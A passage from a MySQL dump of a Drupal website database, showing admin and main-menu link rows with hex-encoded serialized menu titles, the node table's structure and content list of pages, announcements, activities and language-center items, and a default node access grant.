('admin', 292, 'admin_toolbar_tools.extra_links:add_block', 'admin_toolbar_tools.extra_links:block_content_page', 'block_content.add_page', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31373a2241646420636f6e74656e7420626c6f636b223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 1, 4, 6, 8, 291, 292, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 293, 'admin_toolbar_tools.extra_links:block_content.add.basic', 'admin_toolbar_tools.extra_links:add_block', 'block_content.add_form', 'block_content_type=basic', 0x613a313a7b733a31383a22626c6f636b5f636f6e74656e745f74797065223b733a353a226261736963223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a323a7b733a31313a22656e746974795f74797065223b733a31383a22626c6f636b5f636f6e74656e745f74797065223b733a393a22656e746974795f6964223b733a353a226261736963223b7d, 0, 5, 6, 8, 291, 292, 293, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 294, 'entity.block_content_type.collection', 'system.admin_structure', 'entity.block_content_type.collection', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31313a22426c6f636b207479706573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a37383a2243726561746520616e64206d616e616765206669656c64732c20666f726d732c20616e6420646973706c61792073657474696e677320666f7220796f757220636f6e74656e7420626c6f636b732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'block_content', 1, 1, 0, 0, 0x613a303a7b7d, 1, 3, 6, 10, 294, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 295, 'system.linkset_settings', 'system.admin_config_services', 'system.linkset_settings', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32313a224d656e75204c696e6b7365742053657474696e6773223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a34333a22456e61626c65206f722064697361626c6520746865206d656e75206c696e6b73657420656e64706f696e74223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'system', 1, 1, 0, 10, 0x613a303a7b7d, 0, 4, 6, 23, 28, 295, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 296, 'system.development_settings', 'system.admin_config_development', 'system.development_settings', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32303a22446576656c6f706d656e742073657474696e6773223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a33363a22436f6e666967757265207468656d6520646576656c6f706d656e742073657474696e6773223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'system', 1, 1, 0, -19, 0x613a303a7b7d, 0, 4, 6, 23, 30, 296, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 297, 'admin_toolbar_tools.extra_links:views_ui.language_center', 'entity.view.collection', 'entity.view.edit_form', 'view=language_center', 0x613a313a7b733a343a2276696577223b733a31353a226c616e67756167655f63656e746572223b7d, '', 0x733a31353a226c616e67756167652d63656e746572223b, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 10, 20, 297, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 298, 'admin_toolbar_tools.extra_links:node.add.language_center', 'admin_toolbar_tools.extra_links:node.add', 'node.add', 'node_type=language_center', 0x613a313a7b733a393a226e6f64655f74797065223b733a31353a226c616e67756167655f63656e746572223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a323a7b733a31313a22656e746974795f74797065223b733a393a226e6f64655f74797065223b733a393a22656e746974795f6964223b733a31353a226c616e67756167655f63656e746572223b7d, 0, 4, 6, 8, 77, 298, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 299, 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.language_center', 'entity.node_type.collection', 'entity.node_type.edit_form', 'node_type=language_center', 0x613a313a7b733a393a226e6f64655f74797065223b733a31353a226c616e67756167655f63656e746572223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a323a7b733a31313a22656e746974795f74797065223b733a393a226e6f64655f74797065223b733a393a22656e746974795f6964223b733a31353a226c616e67756167655f63656e746572223b7d, 1, 4, 6, 10, 18, 299, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 300, 'admin_toolbar_tools.extra_links:entity.node.field_ui_fieldslanguage_center', 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.language_center', 'entity.node.field_ui_fields', 'node_type=language_center', 0x613a313a7b733a393a226e6f64655f74797065223b733a31353a226c616e67756167655f63656e746572223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a224d616e616765206669656c6473223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 1, 0x613a303a7b7d, 0, 5, 6, 10, 18, 299, 300, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 301, 'admin_toolbar_tools.extra_links:entity.entity_form_display.node.defaultlanguage_center', 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.language_center', 'entity.entity_form_display.node.default', 'node_type=language_center', 0x613a313a7b733a393a226e6f64655f74797065223b733a31353a226c616e67756167655f63656e746572223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31393a224d616e61676520666f726d20646973706c6179223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 2, 0x613a303a7b7d, 0, 5, 6, 10, 18, 299, 301, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 302, 'admin_toolbar_tools.extra_links:entity.entity_view_display.node.default.language_center', 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.language_center', 'entity.entity_view_display.node.default', 'node_type=language_center', 0x613a313a7b733a393a226e6f64655f74797065223b733a31353a226c616e67756167655f63656e746572223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31343a224d616e61676520646973706c6179223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 3, 0x613a303a7b7d, 0, 5, 6, 10, 18, 299, 302, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 303, 'admin_toolbar_tools.extra_links:entity.entity_permissions_form.node.default.language_center', 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.language_center', 'entity.node_type.entity_permissions_form', 'node_type=language_center', 0x613a313a7b733a393a226e6f64655f74797065223b733a31353a226c616e67756167655f63656e746572223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31383a224d616e616765207065726d697373696f6e73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 3, 0x613a303a7b7d, 0, 5, 6, 10, 18, 299, 303, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 304, 'admin_toolbar_tools.extra_links:entity.node_type.delete_form.language_center', 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.language_center', 'entity.node_type.delete_form', 'node_type=language_center', 0x613a313a7b733a393a226e6f64655f74797065223b733a31353a226c616e67756167655f63656e746572223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a363a2244656c657465223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 5, 0x613a303a7b7d, 0, 5, 6, 10, 18, 299, 304, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('main-menu', 305, 'menu_link_content:6bec1422-63fe-47ba-940d-fc00560c2bbe', '', '<front>', '', 0x613a303a7b7d, '', 0x733a383a224167656e63696573223b, NULL, 'Drupal\\menu_link_content\\Plugin\\Menu\\MenuLinkContent', 0x613a303a7b7d, 'menu_link_content', 1, 1, 0, -48, 0x613a313a7b733a393a22656e746974795f6964223b733a323a223131223b7d, 1, 1, 305, 0, 0, 0, 0, 0, 0, 0, 0, '\\Drupal\\menu_link_content\\Form\\MenuLinkContentForm'),
('main-menu', 306, 'menu_link_content:05809300-6342-4573-88ed-bcb2f43777ba', '', 'view.language_center.page_1', 'view_id=language_center&display_id=page_1', 0x613a323a7b733a373a22766965775f6964223b733a31353a226c616e67756167655f63656e746572223b733a31303a22646973706c61795f6964223b733a363a22706167655f31223b7d, '', 0x733a31353a224c616e67756167652043656e746572223b, NULL, 'Drupal\\menu_link_content\\Plugin\\Menu\\MenuLinkContent', 0x613a313a7b733a353a227175657279223b613a303a7b7d7d, 'menu_link_content', 1, 1, 0, -49, 0x613a313a7b733a393a22656e746974795f6964223b733a323a223132223b7d, 0, 1, 306, 0, 0, 0, 0, 0, 0, 0, 0, '\\Drupal\\menu_link_content\\Form\\MenuLinkContentForm');

-- --------------------------------------------------------

--
-- Table structure for table `node`
--

CREATE TABLE `node` (
  `nid` int UNSIGNED NOT NULL,
  `vid` int UNSIGNED DEFAULT NULL,
  `type` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL COMMENT 'The ID of the target entity.',
  `uuid` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='The base table for node entities.';

--
-- Dumping data for table `node`
--

INSERT INTO `node` (`nid`, `vid`, `type`, `uuid`, `langcode`) VALUES
(1, 206, 'page', '6e289810-2092-4f23-8dbc-27018e3e71b0', 'en'),
(3, 213, 'announcement', '2e137e7b-039d-4c96-aec4-7ba51203f9fe', 'en'),
(4, 210, 'announcement', '452c1432-8eb1-4a8b-ac43-3ef1574d483d', 'en'),
(5, 359, 'announcement', 'e807b5f3-b6e6-480e-8f21-21a02ee484a8', 'en'),
(6, 214, 'activities', '7cad397e-4823-4526-8dc8-c229a7dd6682', 'en'),
(7, 288, 'activities', 'f6cb6c9c-a673-4d4a-9cf4-a43bfb8a11cb', 'en'),
(8, 215, 'activities', '4f50e50f-ba64-4dce-8b69-71992147234e', 'en'),
(9, 187, 'activities', '42fa751a-f874-4525-a5be-1cf8371c817d', 'en'),
(10, 358, 'announcement', '456e1aed-4328-444c-92da-004744718707', 'en'),
(11, 314, 'page', '1ce1b3ca-e3d5-4e4b-86c4-259dc27ba921', 'en'),
(17, 188, 'activities', '807a723e-4bef-4c04-b125-e3e0d937c17f', 'en'),
(18, 357, 'announcement', '21e46c0f-4fa4-4da8-be50-09e014c4d9d5', 'en'),
(19, 186, 'activities', '11e2d334-0df7-4b41-b2ed-e8f496ac3cf5', 'en'),
(20, 185, 'activities', '7088e934-0914-456f-8b14-f7e43729a4e1', 'en'),
(21, 91, 'slider', '3cbed464-690f-4d9e-a4af-ede46f141949', 'en'),
(22, 92, 'slider', 'afbae7f1-d580-48fa-b7f8-be68aab5f6e3', 'en'),
(23, 306, 'page', 'a91bb3f7-3280-4ede-b36d-74a0346f81b2', 'en'),
(24, 413, 'page', 'ce026c04-61a7-44fb-8273-9afad1d1d3d4', 'en'),
(25, 287, 'page', '4129d64e-e115-4ff3-bbc3-e4a53638d3e1', 'en'),
(26, 309, 'page', '87bb3a01-a338-47d8-9882-58a873a832a5', 'en'),
(27, 273, 'page', '43852407-9465-468b-8ea8-fe27c1e43ecd', 'en'),
(28, 220, 'activities', '3401b2d3-a6b4-4508-be74-17daae1f30d4', 'en'),
(29, 223, 'activities', 'fcbe8f48-2f1f-4853-bb61-eb3ae7337425', 'en'),
(30, 226, 'announcement', 'a8cbae58-c847-4d29-b903-963ca44804a0', 'en'),
(31, 259, 'announcement', '9f137d07-705a-4e99-83a2-c2c9d560378b', 'en'),
(62, 409, 'announcement', 'e43a81aa-c539-43a4-958a-a716a3bc2344', 'ja'),
(66, 420, 'announcement', '305db2ef-e05b-4971-9c91-4f83bf426518', 'en'),
(67, 421, 'activities', 'fe2b7a92-9ea0-40f3-8b75-26b30b2510ab', 'ja'),
(68, 424, 'activities', '9dcb3df7-f433-4d82-a96e-3ed15a8511b6', 'en'),
(69, 426, 'activities', 'e1058c4d-a061-43f7-a5f4-420b63b99174', 'ja'),
(70, 430, 'activities', 'f19e7478-321b-4464-9fff-7de0306dcb0e', 'en'),
(71, 431, 'activities', '66a27764-3f1f-4d44-b220-22ff4a0dc0ca', 'en'),
(72, 435, 'activities', '970fd61b-6b44-4370-ad4e-c85c8d32160e', 'en'),
(73, 439, 'activities', '3447333b-3176-46dd-89f0-82c8644c73a0', 'en'),
(74, 440, 'activities', '483adb02-8a2d-4301-884d-006d6732d6c2', 'en'),
(75, 448, 'activities', '2bb47b84-0615-429a-88c2-6041146e8ed1', 'en'),
(76, 447, 'activities', 'e0c55c71-96b9-4ac1-b94f-d0277633d79e', 'en'),
(77, 450, 'activities', 'ff37fa9e-b32e-48a5-907d-b49d0d414066', 'en'),
(78, 452, 'activities', 'ff7a7a71-4141-48e1-8bb7-422e9fa444ce', 'en'),
(79, 453, 'activities', '4a294a8e-87a0-4a70-b7f2-08550c519842', 'en'),
(80, 455, 'activities', '668784df-2f7b-4c18-8e8e-167a759e858f', 'en'),
(81, 457, 'activities', 'f211729a-8c1f-4f10-b573-79116540d672', 'en'),
(82, 459, 'activities', '551a7923-5066-460b-b4ba-ce46acf1859c', 'en'),
(83, 464, 'activities', '1012fe54-716f-47ae-8516-59e17a485780', 'en'),
(84, 465, 'activities', 'c15b8ac5-25b6-4023-864c-0b1ace7d8225', 'en'),
(85, 463, 'activities', '23f16ffa-4ed7-45e8-8dd6-a3e4e1d77a5e', 'en'),
(86, 467, 'activities', 'c8c23e99-4134-4c15-a0a6-46899735c4d5', 'en'),
(87, 476, 'activities', 'd7ccba5c-774d-4a57-8a1a-f6ea64cbf54d', 'ja'),
(88, 471, 'activities', 'fec965d1-fae9-448f-a521-cb52d12608c7', 'en'),
(89, 473, 'activities', 'ec84f9d4-61e4-462f-860b-bd8ce87d41cf', 'en'),
(90, 478, 'activities', '3b0b5ddf-823a-403c-81a9-de70ef55293a', 'en'),
(91, 480, 'activities', '6c729118-bce5-49db-88de-9dae025cdf91', 'en'),
(92, 482, 'activities', 'ac4fe3bc-8d17-40a0-a4b3-b061129628f5', 'en'),
(93, 484, 'activities', '93c38e05-530a-4049-b2d9-d82a0df0c31d', 'en'),
(94, 485, 'activities', 'd9bbca77-fd5e-4a9b-bd64-6ca769b494f0', 'en'),
(95, 524, 'activities', 'd900ef48-ffdd-4d3b-afd5-57f94fda81f0', 'en'),
(96, 489, 'activities', '4b960a1d-7e7c-4611-82e7-fdb7b35557ae', 'en'),
(97, 491, 'activities', '22703f31-41df-4c33-8b9b-deb809d01d54', 'en'),
(98, 493, 'activities', 'd6a439eb-cf1a-4e59-8eeb-952caab3cf6d', 'en'),
(99, 495, 'activities', '45b19a66-34f6-49cc-a2b6-f57389499740', 'en'),
(100, 497, 'activities', '3156f282-b977-42a6-8639-bed48ebe76ac', 'en'),
(101, 499, 'activities', '0aa4a645-2717-4381-8921-c51552acc8dc', 'en'),
(102, 501, 'activities', 'e6998317-56d0-4140-89f9-d1ab5de0d741', 'en'),
(103, 505, 'activities', '25a81f97-2d88-44e9-aa5c-6e4ea2e563fc', 'en'),
(104, 504, 'activities', 'd79cd590-6d01-4436-b569-e37e215d96f3', 'en'),
(105, 507, 'activities', 'b1fffed1-ea08-424b-a41f-06968fd6ea9b', 'en'),
(106, 509, 'activities', 'ff9ea4f9-824f-4625-9053-b3ba930327e4', 'en'),
(107, 511, 'activities', 'e6a4f45c-6a7d-4ed0-8f28-65d59e42af54', 'en'),
(108, 513, 'activities', '0c2deb24-ae71-4d85-a2ea-256a5fd015a4', 'en'),
(109, 515, 'activities', 'a82f2fbe-c630-49ff-984a-b65b0a178d22', 'en'),
(110, 517, 'activities', '91cdd95c-ccd8-4705-8f08-404c1e01db11', 'en'),
(111, 519, 'activities', 'c089b8a7-1dfd-44b7-a4bc-25ca98f38ad1', 'en'),
(112, 521, 'activities', 'c2d1fbd9-3d7d-4d26-95cd-e3ddd61b962f', 'en'),
(113, 523, 'activities', '9504eeaa-202e-46ac-94b2-ac7aff86f8c2', 'en'),
(114, 526, 'activities', 'e5865d54-4a6a-43fc-a07c-9f81f36fb762', 'en'),
(115, 528, 'activities', '79d52629-f705-4542-a72b-42116ad3b194', 'en'),
(116, 531, 'activities', '9b74ee7e-5c80-46ef-9906-8b9d651247c9', 'en'),
(117, 532, 'activities', '813d1708-7e1b-4770-a910-7119a62192af', 'en'),
(118, 534, 'activities', '275fb000-e23e-470a-b5ad-2aa5fb7a417d', 'en'),
(119, 537, 'activities', '85fe4af5-6bac-42e8-98b1-d78b45e0becc', 'en'),
(120, 539, 'activities', '41c52226-c62d-4e8d-8b1b-e6e385dbf782', 'en'),
(121, 541, 'activities', '62fe34d6-ba2d-4eb4-b742-e325dfab6204', 'en'),
(122, 544, 'activities', '92d4af2c-6bb2-463e-b2f6-1602291cb54e', 'en'),
(123, 545, 'activities', 'c65ce696-8a84-40a7-a11f-1091e15e29f1', 'en'),
(124, 547, 'activities', '91906f81-e020-413a-abf4-0553f7891916', 'en'),
(125, 549, 'activities', '516acf53-7b8a-4b0f-9148-1888453b82e5', 'en'),
(126, 551, 'activities', 'cc46170e-3837-4ed1-b6aa-ca17f9eafba4', 'en'),
(127, 553, 'activities', 'd6e69713-1c51-444b-86b4-41900b48de81', 'en'),
(128, 555, 'activities', 'f3013a9b-f306-424d-abcd-e4bfab37a80d', 'en'),
(129, 557, 'activities', '4d444f08-462c-4269-8aaa-33cdfe4dae78', 'en'),
(130, 559, 'activities', '2d9b0d4a-fdb1-4caf-935f-2b80d4a3fbaf', 'en'),
(131, 561, 'activities', '481a2c22-572b-4fdd-9ca8-0baa26225705', 'en'),
(132, 563, 'activities', '96f41702-c94c-4f36-b4e2-879f32691a1c', 'en'),
(133, 565, 'activities', '9125f712-591c-4910-a16d-6941af6dc4fd', 'en'),
(134, 567, 'activities', '3e328b8b-53cb-4e46-b314-636907a98c18', 'en'),
(135, 569, 'activities', '3e7643cf-9c8f-4c15-9e78-f39db99db4cc', 'en'),
(136, 571, 'activities', 'b6cd144a-fc32-489f-860d-8588d79f582d', 'en'),
(137, 573, 'activities', '16de8737-6bb1-42aa-9bfb-72910f5ff27c', 'en'),
(138, 575, 'activities', 'a9136ed7-9d0b-4cc7-b0cc-7e623a38b266', 'en'),
(139, 577, 'activities', '235aab72-99d8-467d-834c-a4900b9c1322', 'en'),
(140, 579, 'activities', '9bb06681-7686-4c1b-87a6-800f29a330db', 'en'),
(141, 581, 'activities', 'fe6338e1-0074-40be-a426-31196515c917', 'en'),
(142, 583, 'activities', '9f84cbb7-526c-42e6-83cd-218a6713798b', 'en'),
(143, 585, 'activities', '0b86b49c-231b-445a-8611-ffe1121d87c9', 'en'),
(144, 587, 'activities', '0460200c-baaa-4c7b-afd7-d686c7cb0856', 'en'),
(145, 589, 'activities', '3adf05b2-0c8d-4e93-a2fc-036deaf681f7', 'en'),
(146, 593, 'activities', '39c0589f-1d06-4567-8f4f-2fb1fd34c335', 'en'),
(147, 595, 'activities', '5eb39718-4c90-4407-b07e-ea24d21189c1', 'en'),
(148, 597, 'activities', '8f150e04-453f-49f3-9e8e-fc4c6e16527d', 'en'),
(149, 598, 'activities', '7ac72c58-4595-44a9-9df0-70a3ef8c5b67', 'en'),
(150, 600, 'activities', '4f98e77b-2c4f-49fc-8f80-1e091d0ea425', 'en'),
(151, 602, 'activities', 'f4d2fdf1-e455-4fb7-9a9e-bb16198fcf55', 'en'),
(152, 604, 'activities', '1694cbac-5c86-48eb-9453-e434b0541d92', 'en'),
(153, 606, 'activities', 'f840781b-038f-41c3-b7ae-54262987e650', 'en'),
(154, 609, 'activities', '0779b82b-b9bf-48b8-9173-63e6cfb76a7f', 'en'),
(155, 611, 'announcement', '144b832a-00b4-4827-b78a-b2710f7c0472', 'en'),
(156, 613, 'activities', '7203c032-b477-486e-ab74-ae16117d1bf4', 'en'),
(157, 615, 'activities', '838f1f97-296c-4a8a-94fa-59586a228fb1', 'ja'),
(160, 660, 'activities', 'd6913fb4-9c99-4937-9442-128c698eb5fc', 'en'),
(161, 659, 'activities', 'ae83b3fc-625a-47f2-aa0d-be69c4f98f03', 'ja'),
(162, 625, 'announcement', '2eae04d1-5aca-46eb-873e-cb23a0e801e1', 'en'),
(163, 627, 'announcement', 'cd776a01-63e3-4142-b52b-973e13468949', 'en'),
(164, 629, 'activities', 'fcddc174-6847-441e-b957-1f18e6b91e4d', 'en'),
(165, 631, 'activities', 'a824f403-974c-4d77-8205-ce4d94cd5689', 'en'),
(166, 634, 'activities', 'f6a93a77-0cde-4d3b-a428-89b49b82584e', 'en'),
(167, 636, 'activities', 'dfdbf41b-5fea-450f-a7d3-c8fabbc32c22', 'en'),
(168, 638, 'activities', '13e672f2-6e41-4d08-84c8-ef0635fc4ce1', 'en'),
(169, 640, 'activities', 'b1988467-d9db-44dc-9384-7a2f83d0fafc', 'en'),
(170, 642, 'activities', '8df0f8cd-f73e-41bc-9339-564673522e26', 'en'),
(171, 644, 'activities', 'ffbdd071-23cb-42ec-bad4-d811f4f59efe', 'en'),
(173, 648, 'activities', '9b989769-4a5e-42c3-82e2-d73fd3572bb8', 'en'),
(174, 650, 'activities', '791cde45-42ce-49cf-8709-47cf4bbdda35', 'en'),
(175, 652, 'activities', '0cebda0a-c0f3-4bba-8740-436bfd55b12d', 'en'),
(176, 654, 'activities', '9f12b0cf-2773-4649-80fc-2abbb99ade12', 'en'),
(177, 656, 'activities', '730b1ba7-fe8c-426a-9266-bc164976afd5', 'en'),
(178, 662, 'activities', 'f742e34b-e659-4e8e-99f7-d6f2933967b9', 'en'),
(179, 664, 'activities', '86b4c118-6b9c-40a1-a889-be65a18e112b', 'en'),
(180, 667, 'activities', 'f7b6a6a4-c071-413e-aaec-d0a368e12fdf', 'en'),
(181, 669, 'activities', '8dae967c-2a5d-47c8-aa02-26696ff612b2', 'en'),
(182, 671, 'activities', '1758ddd5-09cc-41e2-b97d-06ef8924046a', 'en'),
(183, 673, 'activities', 'eccff6ad-9a50-44d6-969f-7e6cfc4e403a', 'en'),
(184, 675, 'activities', '15b6dd15-1afb-4199-b386-864fe66bc635', 'en'),
(185, 678, 'activities', 'dd1f5b75-d86a-464e-9b2e-1948d4e8043d', 'en'),
(186, 680, 'activities', 'a6175a6c-5e47-47dc-8a6e-43888a3921b5', 'en'),
(187, 682, 'activities', '5f4a3d7b-4222-4ca2-843e-42d0af0722b4', 'en'),
(188, 684, 'activities', '916e422f-3b36-479d-a6d9-be9fdbb8b8f5', 'en'),
(189, 686, 'activities', 'c9bd173c-2101-408b-a6e2-b8c24804d1b7', 'en'),
(190, 689, 'activities', '26d06efa-8bb6-41bb-b705-65cc6d1965a5', 'en'),
(191, 691, 'activities', '5319ce46-3f7d-40ea-b17b-459b205cb460', 'en'),
(192, 693, 'activities', 'bbde41f8-d364-4ead-939d-d787283fdd45', 'en'),
(193, 696, 'activities', 'b1da89bb-33be-47f0-92a3-28ad3b1bcc6f', 'en'),
(194, 698, 'activities', 'e0950c94-d570-424a-9fd9-67e13908d050', 'en'),
(195, 700, 'activities', 'b7b06cd7-5ecc-4787-b818-b77389f46ca3', 'en'),
(196, 702, 'activities', 'ac94f16b-52f0-492a-9951-43eb8bbf4369', 'en'),
(197, 704, 'activities', 'fc4a0574-06e4-458b-9c81-7b50c2d9b5d2', 'en'),
(198, 706, 'activities', '392c5568-4023-4e97-877a-5c461a6003f3', 'en'),
(199, 708, 'activities', '65daec82-e13e-4773-95a4-c870e1d29264', 'en'),
(200, 710, 'activities', 'dbe6e226-66ed-481f-8e53-b0439d90e53b', 'en'),
(204, 720, 'language_center', 'f444d929-507d-4ebe-8631-1270562ac670', 'ja'),
(205, 721, 'language_center', '1fd526dc-3ba8-4246-a6ce-7be7ebbc21b6', 'ja'),
(206, 723, 'language_center', '058fd0ef-310e-44f6-a5df-7fd80ba44896', 'ja');

-- --------------------------------------------------------

--
-- Table structure for table `node_access`
--

CREATE TABLE `node_access` (
  `nid` int UNSIGNED NOT NULL DEFAULT '0' COMMENT 'The "node".nid this record affects.',
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The "language".langcode of this node.',
  `fallback` tinyint UNSIGNED NOT NULL DEFAULT '1' COMMENT 'Boolean indicating whether this record should be used as a fallback if a language condition is not provided.',
  `gid` int UNSIGNED NOT NULL DEFAULT '0' COMMENT 'The grant ID a user must possess in the specified realm to gain this row''s privileges on the node.',
  `realm` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The realm in which the user must possess the grant ID. Modules can define one or more realms by implementing hook_node_grants().',
  `grant_view` tinyint UNSIGNED NOT NULL DEFAULT '0' COMMENT 'Boolean indicating whether a user with the realm/grant pair can view this node.',
  `grant_update` tinyint UNSIGNED NOT NULL DEFAULT '0' COMMENT 'Boolean indicating whether a user with the realm/grant pair can edit this node.',
  `grant_delete` tinyint UNSIGNED NOT NULL DEFAULT '0' COMMENT 'Boolean indicating whether a user with the realm/grant pair can delete this node.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Identifies which realm/grant pairs a user must possess in…';

--
-- Dumping data for table `node_access`
--

INSERT INTO `node_access` (`nid`, `langcode`, `fallback`, `gid`, `realm`, `grant_view`, `grant_update`, `grant_delete`) VALUES
(0, '', 1, 0, 'all', 1, 0, 0);

-- --------------------------------------------------------

--
-- Table structure for table `node_field_data`
--

CREATE TABLE `node_field_data` (
  `nid` int UNSIGNED NOT NULL,
  `vid` int UNSIGNED NOT NULL,
